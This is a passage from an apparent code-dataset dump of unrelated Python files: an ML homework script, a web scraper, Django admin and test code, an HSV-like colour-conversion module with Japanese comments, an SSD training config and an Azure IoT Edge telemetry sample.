Dummify\r\ny_df = pd.DataFrame({'output': data_frame['y'].apply(lambda x: 1 if x == 'yes' else 0)}) # 1 for \"yes\", 0 for \"no\"\r\n# Print out parameters\r\nprint(\"Input parameters:\\n\", X_df.columns.values, \"\\n\")\r\nprint(\"Output parameters:\\n\", y_df.columns.values, \"\\n\")\r\n# Turn into arrays\r\nX = X_df.values\r\ny = y_df.values\r\n# Split arrays into random train and test subsets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\r\n\r\n# # --------------------------------------Standardization--------------------------------------\r\n# # Removes the mean and scales the data to unit variance.\r\n# scaler = StandardScaler()\r\n# # Fit only to the training data\r\n# scaler.fit(X_train)\r\n# # Apply the transformations to the data:\r\n# X_train = scaler.transform(X_train)\r\n# X_test = scaler.transform(X_test)\r\n# # Print the amount of Training Set and Testing set for X and y respectively\r\n# print(\"The amount of X_train\", len(X_train))\r\n# print(\"The amount of y_train:\", len(y_train))\r\n# print(\"The amount of X_test\", len(X_test))\r\n# print(\"The amount of y_test:\", len(y_test), \"\\n\")\r\n\r\n# --------------------------------------Decision tree 
analysis------------------------------------\r\n# Training\r\ntree = DecisionTreeClassifier(criterion='entropy', max_depth=5) # Maximum depth equals 5\r\ntree_result = tree.fit(X_train, y_train)\r\n# Prediction\r\ntree_pred = tree.predict(X_test)\r\n\r\n# --------------------------------------Multi-layer perceptron analysis----------------------------\r\n# Training\r\nmlp = MLPClassifier(activation='logistic', hidden_layer_sizes=(80, 80,)) # 2 layers with the same number of neurons\r\nmlp_result = mlp.fit(X_train, y_train)\r\n# Prediction\r\nmlp_pred = mlp.predict(X_test)\r\n\r\n# --------------------------------------Evaluation results--------------------------------------\r\n# Using 5-fold cross validation; each item stands for one fold's result\r\nprint(\"mlp_cross_val_score:\\n\", cross_val_score(mlp, X, y, cv=5))\r\nprint(\"tree_cross_val_score:\\n\", cross_val_score(tree, X, y, cv=5))\r\n","sub_path":"Machine learning/hw2_q2/Step 3/hw2_2_full.py","file_name":"hw2_2_full.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"283107512","text":"import random\nfrom matplotlib import pyplot\n\n# x_walk = [datetime.datetime.strptime(row[0],'%Y-%m-%d') for row in rows]\n\nrandom_walk = [-1 if random.random() < 0.5 else 1]\n\nfor i in range(1, 1000):\n    random_walk.append(random_walk[i - 1] + (-1 if random.random() < 0.5 else 1))\n\npyplot.plot(random_walk)\npyplot.show()","sub_path":"AI/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"267525878","text":"import urllib2\r\n \r\n# grab the source\r\nim = urllib2.urlopen('https://espace-personnel.agirc-arrco.fr/static/agirc-arrco/esaa/img/gps_btpr.jpg')\r\nsource = im.read()\r\n \r\n# create the file and write everything into it (the original also called file('gps_btpr.jpg', 'wb') here, which is redundant)\r\nfichier = open('gps_btpr.jpg', 'wb')\r\nfichier.write(source)\r\nfichier.close()\r\n","sub_path":"package01/import.img.py","file_name":"import.img.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"210943766","text":"# bs4 is the package that provides the BeautifulSoup Python library\nfrom bs4 import BeautifulSoup \n# Requests lets you send HTTP requests and access the response data in the same way.\nimport requests \n# pprint is used to pretty-print our output.\nfrom pprint import pprint\n# json is used to perform methods on dictionaries/JSON strings (loads, dumps).\nimport json\n\nurl=\"https://paytmmall.com/fmcg-sauces-pickles-glpid-101471?page=1&latitude=12.868065800000002&longitude=77.7128736\"\nresponse=requests.get(url)\n# print response.text\n\nsoup=BeautifulSoup(response.text,\"lxml\")\n# print soup\npickleDetails=soup.find(\"div\",class_=\"_2Bze\")\n# print pickleDetails\n\n\nfor i in pickleDetails:\n    PickleDict={} \n    allPickleOfPrices=i.find_all(\"div\",class_=\"_2bo3\")\n    # print allPickleOfPrices \n    allPickleOfImages=i.find_all(\"div\",class_=\"_3nWP\") \n    # print allPickleOfImages\n    allPickleOfUrl=i.find_all(\"div\",class_=\"_3WhJ\")\n    # print allPickleOfUrl\n    allPickleOfNames=i.find_all(\"div\",class_=\"pCOS\")\n    # print allPickleOfNames\n    for index in allPickleOfImages:\n        images=index.img[\"src\"]\n        print (images)\n    for index in allPickleOfPrices:\n        prices=index.find(\"div\",class_=\"_1kMS\").span.get_text()\n        # 
print prices\n for index in allPickleOfUrl:\n Url=index.a[\"href\"]\n # print Url\n for index in allPickleOfNames:\n names=index.find(\"div\",class_=\"_2apC\").get_text()\n # print names\n \n\n PickleDict[\"picklePrices\"]=prices\n PickleDict[\"pickleImages\"]=images\n PickleDict[\"pickleUrls\"]=Url\n PickleDict[\"pickleNames\"]=names\n print (PickleDict)\n","sub_path":"Project2/Project2.py","file_name":"Project2.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"605400085","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\n\n\n@admin.register(models.User)\nclass CustomUserAdmin(UserAdmin):\n\n \"\"\" Custom User Admin \"\"\"\n\n fieldsets = UserAdmin.fieldsets + (\n (\"Custom Profile\", {\"fields\": (\"gender\", \"bio\", \"major\", \"login_method\",),},),\n )\n\n list_display = (\n \"username\",\n \"email\",\n \"major\",\n \"gender\",\n \"login_method\",\n )\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"48846453","text":"from django.test import TestCase\n\n# Create your tests here.\nfrom student.models import Student\n\n\nclass StudentTestCase(TestCase):\n def setUp(self) -> None:\n Student.objects.create(\n name = 'haha',\n sex = 1,\n email = '123456789@qq.com',\n profession='leader',\n qq='333121',\n phone='32222',\n status='2'\n )\n\n def test_create_and_sex_show(self):\n student = Student.objects.create(\n name='haha',\n sex=1,\n email='123456789@qq.com',\n profession='leader',\n qq='333121',\n phone='32222',\n status='1'\n )\n self.assertEqual(student.sex_show, '男', '性别字段不一致')\n","sub_path":"student_sys/student/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"162870594","text":"\"\"\"HULビュー\nこの color_hul_model.py ファイルに GPL は混ざってないが、\nリポジトリにGPLが混じっていて、そのライブラリの一部になっているから、GPLが嫌なら、厳密に言えば、\nHULビューはアルゴリズムなんで 著作権無いんで理解したら ソースを一から独自実装し直して持ってけだぜ(^~^)\n\nHULビューって何?\n=====================\n\nざっくり言うと HSVモデルを図形で説明(View)する試みの1つで、それに失敗したのが HULビューです。\nHSVモデルは、色相(H)と、色調(彩度(S)、明度(V))を扱う色空間モデルです。\n\nHULビューでは、Hue(色相環の角度、弧度法)、Upper(上限値)、Lower(下限値) から\n円に内接する正三角形を回転させることで HSVモデルを説明するビューです(説明には失敗)。\n\nto_hue_angle()関数の使い方\n=========================\n\nこのプログラムで color というと、以下の仕様です。\nRGB値は R, G, B の順で 0.0~1.0 で指定してください。\n\n Lower Upper\n 0.0 0.2 0.7 1.0\n +------+----------------+--------+\nR | | | 0.7 |\n +------+-------+--------+ |\nG | | | 0.4 |\n +------+-------+ |\nB | | 0.2 |\n +------+-------------------------+\n\n <-----> <--------------> <------>\n Left Middle Right\n Box Box Box\n\ncolor = (0.7, 0.4, 0.2)\n\nto_hue_angle()関数を使うと 弧度法が返ってきます。\n戻り値の2つ目はデバッグ用の情報なので要りません。\n\nhue_angle, _ = to_hue_angle(color)\n# hue_angle is 23\n\nto_color()関数の使い方\n=====================\n\n(再掲)\n Lower Upper\n 0.0 0.2 0.7 1.0\n +------+----------------+--------+\nR | | | 0.7 |\n +------+-------+--------+ |\nG | | | 0.4 |\n +------+-------+ |\nB | | 0.2 |\n +------+-------------------------+\n\n <-----> <--------------> <------>\n Left Middle Right\n Box Box Box\n\nto_color()関数を使うと color が返ってきます。\n第一引数のリストは先頭から、全体を 1.0 としたときの LeftBoxの比、MiddleBoxの比、RightBoxの比です。\n第二引数は色相環の角度(ラジアン)です。\n\ncolor = to_color([0.2, 0.5, 0.3], 
math.radians(23))\n# color is (0.7, 0.39683272553278354, 0.2)\n\nhul_to_color()関数の使い方\n=====================\n\nしかし、せっかく HULビュー(Hue,Upper,Lowerビュー)という名前なのですから、\nUpper値、Lower値を使っても 色 を出せるようにしましょう。\n引数の順番は 先頭から Hue(弧度法), Upper, Lower です。\n\ncolor = hul_to_color(23, 0.7, 0.2)\n# color is (0.7, 0.3968327255327835, 0.2)\n\"\"\"\n\nimport math\n\n\nACCURACY = 0.0000001 # 浮動小数点精度。ネイピアの対数表の精度をリスペクトして、適当に7桁にしたんで深い意味ない(^~^)\n\n\ndef hul_to_color(hue_angle, upper, lower):\n \"\"\"順関数。RGB値を 0.0~1.0 とする色を返します\"\"\"\n return to_color([lower, upper-lower, 1.0-(upper-lower)], math.radians(hue_angle))\n\n\ndef to_hue_angle(color):\n \"\"\"逆関数。精度は int型の弧度法しかありません\"\"\"\n theta, upper, lower, c_phase = __inverse_func_radians(color)\n\n # 弧度法の整数部の精度で調整したので、小数部を切り上げ、切り捨てして、ずれを0にします\n # M はモノクロ\n if c_phase == 'M':\n angle = float('Nan')\n # A,C系は キリがいい数\n elif c_phase in ('A00u', 'A04D', 'A08u', 'A12D', 'A16u', 'A20D',\n 'C02U', 'C06d', 'C10U', 'C14d', 'C18U', 'C22d'):\n angle = math.degrees(theta)\n # B系は diff が正の数なので、そのまま切り捨てでいい\n elif c_phase in ('B01u', 'B05D', 'B09u', 'B13D', 'B17u', 'B21D'):\n angle = math.floor(math.degrees(theta))\n # D系 はdiffが負の数なので、 ceil すると 切り捨ての効果が出る\n elif c_phase in ('D03U', 'D07d', 'D11U', 'D15d', 'D19U', 'D23d'):\n angle = math.ceil(math.degrees(theta))\n else:\n raise Exception(\n f\"ERROR | Logic error. theta={theta} upper={upper} \\\nlower={lower} c_phase={c_phase}\")\n\n return angle, (upper, lower, c_phase)\n\n\ndef __inverse_func_radians(color):\n \"\"\"逆関数。ラジアン値で 0.02 未満の誤差が出ます。\n モノクロのとき Nan を返します\"\"\"\n c_phase = color_phase(color)\n # 一応、浮動小数点数の丸め誤差を消しとくか。厳密じゃないけど(^~^)\n red = color[0]\n green = color[1]\n blue = color[2]\n if c_phase == 'M':\n return float('Nan')\n # raise Exception(f\"monocro color=({red}, {green}, {blue})\")\n\n upper = max(red, green, blue)\n lower = min(red, green, blue)\n\n if c_phase == 'A00u':\n theta = math.radians(0)\n elif c_phase == 'C02U':\n theta = math.radians(30)\n elif c_phase == 'A04D':\n theta = math.radians(60)\n elif c_phase == 'C06d':\n theta = math.radians(90)\n elif c_phase == 'A08u':\n theta = math.radians(120)\n elif c_phase == 'C10U':\n theta = math.radians(150)\n elif c_phase == 'A12D':\n theta = math.radians(180)\n elif c_phase == 'C14d':\n theta = math.radians(210)\n elif c_phase == 'A16u':\n theta = math.radians(240)\n elif c_phase == 'C18U':\n theta = math.radians(270)\n elif c_phase == 'A20D':\n theta = math.radians(300)\n elif c_phase == 'C22d':\n theta = math.radians(330)\n else:\n theta = None\n\n if theta is not None:\n return theta, upper, lower, c_phase\n\n # 1本はU、1本はL なので、U と L を消せば動いているバーの長さになります\n bar_length = red + green + blue - upper - lower\n width = bar_length - lower\n diameter = upper - lower\n\n # 24箇所に分けて、1つずつ 図形的に証明しようとしたら 浮動小数点の丸みがあるのか\n # そもそも 誤差0 にできないし、かなり難しいので、今後の挑戦課題(^~^)\n # 今回は図形的証明を止め、 逆関数が作れればいい、ということにした(^~^)\n #\n # radius = round_limit(diameter / 2)\n # adjacent = radius\n # tanjent = diameter - width - radius\n # opposite = (math.sqrt(3)/2) * tanjent\n # hipotenuse = math.sqrt(adjacent**2 + opposite**2)\n\n # 1文字目が Bなら asin, Dなら acos です。\n # 4文字目が大文字の U,Dなら width が 半径より長く、 小文字の u,d なら width が半径より短いぜ(^~^)\n #\n # sin(30°)=0.5、cos(60°)=0.5 と、30°刻みの角度を有理数にできるから sin, cos の逆関数 asin, acos を使ってるだけで、\n # ラジアンで 0.02未満、弧度法で 0.7未満の誤差があるぜ(^~^) つまり騙し絵、フェイク画像(^~^)\n # ちょうどいい曲線をぶつけただけで 正確な曲線を取れてないぜ(^~^)\n #\n # 全部 asin にする、とか asin, acos のどちらかに揃えたかったが、切り上げ、切り捨て、丸め でずれるなど\n # 合わないので、仕方なく分けてあるぜ(^~^)\n #\n # しかし こんなことやってたら 図形的な証明にならないよな、あーあ(^~^)切り上げ時だぜ(^~^)\n if c_phase == 'B01u':\n theta = 
math.asin(width/diameter)\n elif c_phase == 'D03U':\n theta = math.acos((diameter - width)/diameter) - math.radians(30)\n elif c_phase == 'B05D':\n theta = math.asin((diameter - width)/diameter) + math.radians(60)\n elif c_phase == 'D07d':\n theta = math.acos(width/diameter) + math.radians(30)\n elif c_phase == 'B09u':\n theta = math.asin(width/diameter) + math.radians(120)\n elif c_phase == 'D11U':\n theta = math.acos((diameter - width)/diameter) + math.radians(90)\n elif c_phase == 'B13D':\n theta = math.asin((diameter - width)/diameter) + math.radians(180)\n elif c_phase == 'D15d':\n theta = math.acos(width/diameter) + math.radians(150)\n elif c_phase == 'B17u':\n theta = math.asin(width/diameter) + math.radians(240)\n elif c_phase == 'D19U':\n theta = math.acos((diameter - width)/diameter) + math.radians(210)\n elif c_phase == 'B21D':\n theta = math.asin((diameter - width)/diameter) + math.radians(300)\n elif c_phase == 'D23d':\n theta = math.acos(width/diameter) + math.radians(270)\n else:\n raise Exception(\n f\"ERROR | Logic error. color=({red}, {green}, {blue})\")\n\n return theta, upper, lower, c_phase\n\n\ndef color_phase(color):\n \"\"\"角度を、以下の文字列で返します。図解もありますので参照してください。\n\n 図解\n https://github.com/muzudho/practice-open-cv2/blob/main/@doc/c_step/img/20210411color61a5a1_c_step_28.png\n\n * 'M' - モノクロ\n\n A系 0°をスタート地点に、60°ずつ回転した形\n B系 30°の幅があるので、sin使う方\n C系 30°をスタート地点に、60°ずつ回転した形\n D系 30°の幅があるので、cos使う方\n\n * 'A00u' - ( 0° ) 緑と青は等しく、それより赤が大きい\n * 'B01u' - ( 0°< x< 30°) 下から青、緑、赤。緑上昇中\n * 'C02U' - ( 30° ) 下から青、緑、赤。緑上昇中\n * 'D03U' - ( 30°< x< 60°) 下から青、緑、赤。緑上昇中\n * 'A04D' - ( 60° ) 赤と緑は等しく、それより青は小さい\n * 'B05D' - ( 60°< x< 90°) 下から青、赤、緑。赤下降中\n * 'C06d' - ( 90° ) 下から青、赤、緑。赤下降中\n * 'D07d' - ( 90°< x<120°) 下から青、赤、緑。赤下降中\n * 'A08u' - ( 120° ) 青と赤は等しく、それより緑が大きい\n * 'B09u' - (120°< x<150°) 下から赤、青、緑。青上昇中\n * 'C10U' - ( 150° ) 下から赤、青、緑。青上昇中\n * 'D11U' - (150°< x<180°) 下から赤、青、緑。青上昇中\n * 'A12D' - ( 180° ) 緑と青は等しく、それより赤は小さい\n * 'B13D' - (180°< x<210°) 下から赤、緑、青。緑下降中\n * 'C14d' - ( 210° ) 下から赤、緑、青。緑下降中\n * 'D15d' - (210°< x<240°) 下から赤、緑、青。緑下降中\n * 'A16u' - ( 240° ) 赤と緑は等しく、それより青が大きい\n * 'B17u' - (240°< x<270°) 下から緑、赤、青。赤上昇中\n * 'C18U' - ( 270° ) 下から緑、赤、青。赤上昇中\n * 'D19U' - (270°< x<300°) 下から緑、赤、青。赤上昇中\n * 'A20D' - ( 300° ) 赤と青は等しく、それより緑が小さい\n * 'B21D' - (300°< x<330°) 下から緑、青、赤。青下降中\n * 'C22d' - ( 330° ) 下から緑、青、赤。青下降中\n * 'D23d' - (330°< x<360°) 下から緑、青、赤。青下降中\n \"\"\"\n\n # math.isclose()ってのは、浮動小数点数の丸め誤差を消して等号比較するやつな(^~^)\n red = color[0]\n green = color[1]\n blue = color[2]\n if math.isclose(red, green, abs_tol=ACCURACY) \\\n and math.isclose(green, blue, abs_tol=ACCURACY):\n # Monocro\n return 'M'\n\n upper = max(red, green, blue)\n lower = min(red, green, blue)\n\n if math.isclose(green, blue, abs_tol=ACCURACY) and math.isclose(red, upper, abs_tol=ACCURACY):\n c_phase = 'A00u'\n elif math.isclose(red, green, abs_tol=ACCURACY) and math.isclose(blue, lower, abs_tol=ACCURACY):\n c_phase = 'A04D'\n elif math.isclose(red, blue, abs_tol=ACCURACY) and math.isclose(green, upper, abs_tol=ACCURACY):\n c_phase = 'A08u'\n elif math.isclose(green, blue, abs_tol=ACCURACY) and math.isclose(red, lower, abs_tol=ACCURACY):\n c_phase = 'A12D'\n elif math.isclose(red, green, abs_tol=ACCURACY) and math.isclose(blue, upper, abs_tol=ACCURACY):\n c_phase = 'A16u'\n elif math.isclose(red, blue, abs_tol=ACCURACY) and math.isclose(green, lower, abs_tol=ACCURACY):\n c_phase = 'A20D'\n else:\n c_phase = None\n\n if c_phase is not None:\n return c_phase\n\n # 1本はU、1本はL なので、U と L を消せば動いているバーの長さになります\n bar_length = red + green + 
blue - upper - lower\n width = bar_length - lower\n\n diameter = upper - lower\n radius = diameter / 2\n\n if math.isclose(red, upper, abs_tol=ACCURACY) \\\n and not math.isclose(green, upper, abs_tol=ACCURACY) \\\n and math.isclose(blue, lower, abs_tol=ACCURACY):\n # 下から青、緑、赤。緑上昇中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 30°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C02U'\n elif width < radius:\n # +-+\n # | |\n # | | +-+ < 30°\n # | | |^| x\n # +-+ +-+ +-+ 0° <=\n # R G B\n c_phase = 'B01u'\n else:\n # +-+ < 60°\n # | | ^ x\n # | | +-+ 30° <\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'D03U'\n elif not math.isclose(red, lower, abs_tol=ACCURACY) \\\n and math.isclose(green, upper, abs_tol=ACCURACY) \\\n and math.isclose(blue, lower, abs_tol=ACCURACY):\n # 下から青、赤、緑。赤下降中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # +-+ | | x == 90°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C06d'\n elif radius < width:\n # +-+ < 120°\n # v | | x\n # +-+ | | 90° <=\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'B05D'\n else:\n # +-+\n # | |\n # +-+ | | < 90°\n # |v| | | x\n # +-+ +-+ +-+ 60° <=\n # R G B\n c_phase = 'D07d'\n elif math.isclose(red, lower, abs_tol=ACCURACY) \\\n and math.isclose(green, upper, abs_tol=ACCURACY) \\\n and not math.isclose(blue, upper, abs_tol=ACCURACY):\n # 下から赤、青、緑。青上昇中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 150°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C10U'\n elif width < radius: # 半分を含まない(必要)\n # +-+\n # | |\n # | | +-+ < 150°\n # | | |^| x\n # +-+ +-+ +-+ 120° <=\n # R G B\n c_phase = 'B09u'\n else:\n # +-+ < 180°\n # | | ^ x\n # | | +-+ 150° <=\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'D11U'\n elif math.isclose(red, lower, abs_tol=ACCURACY) \\\n and not math.isclose(green, lower, abs_tol=ACCURACY) \\\n and math.isclose(blue, upper, abs_tol=ACCURACY):\n # 緑下降中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 210°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C14d'\n elif radius < width:\n # +-+ < 180°\n # v | | x\n # +-+ | | 210° <\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'B13D'\n else:\n # +-+\n # | |\n # +-+ | | < 210°\n # |v| | | x\n # +-+ +-+ +-+ 240° <\n # R G B\n c_phase = 'D15d'\n elif not math.isclose(red, upper, abs_tol=ACCURACY) \\\n and math.isclose(green, lower, abs_tol=ACCURACY) \\\n and math.isclose(blue, upper, abs_tol=ACCURACY):\n # 赤上昇中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # +-+ | | x == 270°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C18U'\n elif width < radius:\n # +-+\n # | |\n # +-+ | | < 270°\n # |^| | | x\n # +-+ +-+ +-+ 240° <=\n # R G B\n c_phase = 'B17u'\n else:\n # +-+ < 300°\n # ^ | | x\n # +-+ | | 270° <\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'D19U'\n elif math.isclose(red, upper, abs_tol=ACCURACY) \\\n and math.isclose(green, lower, abs_tol=ACCURACY) \\\n and not math.isclose(blue, lower, abs_tol=ACCURACY):\n # 青下降中\n if math.isclose(width, radius, abs_tol=ACCURACY):\n # +-+\n # | |\n # | | +-+ x == 330°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'C22d'\n elif radius < width:\n # +-+ 300° <\n # | | v x\n # | | +-+ < 330°\n # | | | |\n # +-+ +-+ +-+\n # R G B\n c_phase = 'B21D'\n else:\n # +-+\n # | |\n # | | +-+ 330° <\n # | | |v| x\n # +-+ +-+ +-+ < 360°\n # R G B\n c_phase = 'D23d'\n else:\n raise Exception(\n f\"ERROR | Logic error. 
color=({red}, {green}, {blue})\")\n\n return c_phase\n\n\ndef to_color(bar_rate, theta):\n \"\"\"\n bar_rate : [float, float, float]\n 合計 1.0 となる 0.0~1.0 の値が3つ。\n 左の箱から1、2、3番目の順\n theta : float\n ラジアンで 0 を 12時の方向(赤)とし、\n 時計回りに黄色、緑、青緑……、と進んでいきます\n \"\"\"\n\n # 円周上の3点のx位置\n r_x = math.cos(theta)\n g_x = math.cos(theta-math.radians(120))\n b_x = math.cos(theta+math.radians(120))\n\n # -1.0 ~ 1.0 を使いやすいように 0.0 ~ 1.0 に変換\n rrx = (r_x + 1.0) / 2\n ggx = (g_x + 1.0) / 2\n bbx = (b_x + 1.0) / 2\n\n right_end = max(rrx, ggx, bbx)\n left_end = min(rrx, ggx, bbx)\n diff = right_end - left_end\n\n rrrx = __one_fit(rrx, left_end, diff)\n gggx = __one_fit(ggx, left_end, diff)\n bbbx = __one_fit(bbx, left_end, diff)\n\n return (\n rrrx * bar_rate[1] + bar_rate[0],\n gggx * bar_rate[1] + bar_rate[0],\n bbbx * bar_rate[1] + bar_rate[0])\n\n\ndef __one_fit(rate, left_end, diff):\n \"\"\"フィットさせます\"\"\"\n if diff == 0:\n return 0.0 # 0除算が起こるなら(仕方が無いので)差分は 0 にします\n return (rate-left_end) / diff\n\n\n# Example:\n#\n#color = (0.7, 0.4, 0.2)\n#hue_angle, _ = to_hue_angle(color)\n#print(f\"hue_angle = {hue_angle}°\")\n# # hue_angle = 23°\n#\n# color = to_color([0.2, 0.5, 0.3], math.radians(23))\n# print(f\"color = {color}\")\n# # color = (0.7, 0.39683272553278354, 0.2)\n#\n# color = hul_to_color(23, 0.7, 0.2)\n# print(f\"color = {color}\")\n# # color = (0.7, 0.3968327255327835, 0.2)\n","sub_path":"c_step28/color_hul_model.py","file_name":"color_hul_model.py","file_ext":"py","file_size_in_byte":20418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"263053796","text":"class Config():\n def __init__(self):\n self.dataset_name = 'SED-dataset'\n self.image_dir = '/home/docker_sharing_folder/sed-datasets/SHWD/VOC2028/JPEGImages'\n self.dataset_dir = '/home/docker_sharing_folder/sed-datasets'\n self.coco_api = '/home/docker_sharing_folder/cocoapi/PythonAPI'\n self.label_set = ['head', 'helmet']\n self.input_shape = [300, 300]\n self.num_examples = -1\n self.batch_size = 16\n self.SSD300 = {'ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2]],\n 'scales': [0.1, 0.2, 0.375, 0.55, 0.725, 0.9, 1.075],\n 'fm_sizes': [38, 19, 10, 5, 3, 1],\n 'image_size': 300}\n self.SSD512 = {'ratios': [[2], [2, 3], [2, 3], [2, 3], [2], [2], [2]],\n 'scales': [0.07, 0.15, 0.3, 0.45, 0.6, 0.75, 0.9, 1.05],\n 'fm_sizes': [64, 32, 16, 8, 6, 4, 1],\n 'image_size': 512}\n self.arch='ssd300'\n self.neg_ratio = 3\n self.initial_lr = 1e-3\n self.momentum = 0.9\n self.weight_decay = 5e-4\n self.num_epochs = 300\n self.checkpoint_dir = 'checkpoints'\n self.pretrained_type = 'base'\n self.gpu_id = \"0\"\n","sub_path":"configs/train_config.py","file_name":"train_config.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"8393863","text":"# Work in progress to establish baseline infrastructure and plumbing for python edge modules\r\n# Needs extreme cleanup\r\n\r\nimport random\r\nimport time\r\nimport sys\r\nimport os\r\nimport datetime\r\nimport iothub_client\r\nfrom iothub_client import IoTHubClient, IoTHubClientError, IoTHubTransportProvider, IoTHubClientResult\r\nfrom iothub_client import IoTHubMessage, IoTHubMessageDispositionResult, IoTHubError, DeviceMethodReturnValue\r\n\r\n# choose HTTP, AMQP or MQTT as transport protocol\r\nPROTOCOL = IoTHubTransportProvider.MQTT\r\nMESSAGE_TIMEOUT = 10000\r\nAVG_WIND_SPEED = 10.0\r\nMSG_TXT = \"{\\\"deviceId\\\": \\\"MyFirstPythonDevice\\\",\\\"windSpeed\\\": 
%.2f}\"\r\n\r\ndef iothub_client_init(connStr):\r\n\r\n # prepare iothub client\r\n client = IoTHubClient(connStr, PROTOCOL)\r\n\r\n # set the time until a message times out\r\n client.set_option(\"messageTimeout\", MESSAGE_TIMEOUT)\r\n \r\n CERT_FILE = os.environ['EdgeModuleCACertificateFile'] \r\n print(\"Adding TrustedCerts from: {0}\".format(CERT_FILE))\r\n \r\n # this brings in x509 privateKey and certificate\r\n file = open(CERT_FILE)\r\n try:\r\n client.set_option(\"TrustedCerts\", file.read())\r\n print(\"Added cert\")\r\n except IoTHubClientError as iothub_client_error:\r\n print('Setting IoT Edge TrustedCerts failed (%s)' % iothub_client_error)\r\n \r\n file.close()\r\n\r\n return client\r\n\r\ndef send_confirmation_callback(message, result, user_context):\r\n\r\n map_properties = message.properties()\r\n print ( \" message_id: %s\" % message.message_id )\r\n print ( \" correlation_id: %s\" % message.correlation_id )\r\n\r\n key_value_pair = map_properties.get_internals()\r\n print ( \" Properties: %s\" % key_value_pair )\r\n\r\n\r\ndef init(connStr):\r\n\r\n try:\r\n client = iothub_client_init(connStr)\r\n\r\n while True:\r\n\r\n msg_txt_formatted = MSG_TXT % (\r\n AVG_WIND_SPEED + (random.random() * 4 + 2))\r\n\r\n # messages can be encoded as string or bytearray\r\n message = IoTHubMessage(msg_txt_formatted)\r\n client.send_event_async(\"temperatureOutput\", message, send_confirmation_callback, None)\r\n\r\n # Wait for Commands or exit\r\n print ( \"IoTHubClient waiting for commands, press Ctrl-C to exit\" )\r\n\r\n status = client.get_send_status()\r\n print ( \"Send status: %s\" % status )\r\n time.sleep(10)\r\n\r\n except IoTHubError as iothub_error:\r\n print ( \"Unexpected error %s from IoTHub\" % iothub_error )\r\n return\r\n\r\n except KeyboardInterrupt:\r\n print ( \"IoTHubClient sample stopped\" )\r\n\r\nif __name__ == '__main__':\r\n\r\n print ( \"\\nPython %s\" % sys.version )\r\n\r\n try:\r\n CONNECTION_STRING = os.environ['EdgeHubConnectionString']\r\n print(CONNECTION_STRING)\r\n\r\n except Exception as option_error:\r\n\r\n print ( option_error )\r\n sys.exit(1)\r\n\r\n print ( \"Starting the IoT Hub Python sample...\" )\r\n print ( \" Connection string=%s\" % CONNECTION_STRING )\r\n\r\n init(CONNECTION_STRING)","sub_path":"modules/PythonModule/HelloEdge.py","file_name":"HelloEdge.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"387328740","text":"class Solution:\n def longestCommonPrefix(self, strs):\n if not strs: return \"\"\n c = 0\n for i in range(len(strs[0])):\n try:\n tmp = [x[i] for x in strs]\n except IndexError:\n break \n if len(set(tmp)) == 1:\n c += 1\n else: \n break\n return strs[0][:c]","sub_path":"array_and_string/longest_common_prefix_method2.py","file_name":"longest_common_prefix_method2.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"654134726","text":"import datetime\n\nfrom django.db import models, transaction\nfrom django.urls import reverse\nfrom django_countries.fields import CountryField\n\nfrom workshops.mixins import (\n AssignmentMixin,\n CreatedUpdatedMixin,\n COCAgreementMixin,\n DataPrivacyAgreementMixin,\n EventLinkMixin,\n HostResponsibilitiesMixin,\n StateMixin,\n InstructorAvailabilityMixin,\n)\nfrom workshops.models import (\n STR_MED,\n STR_LONG,\n STR_LONGEST,\n Language,\n KnowledgeDomain,\n AcademicLevel,\n 
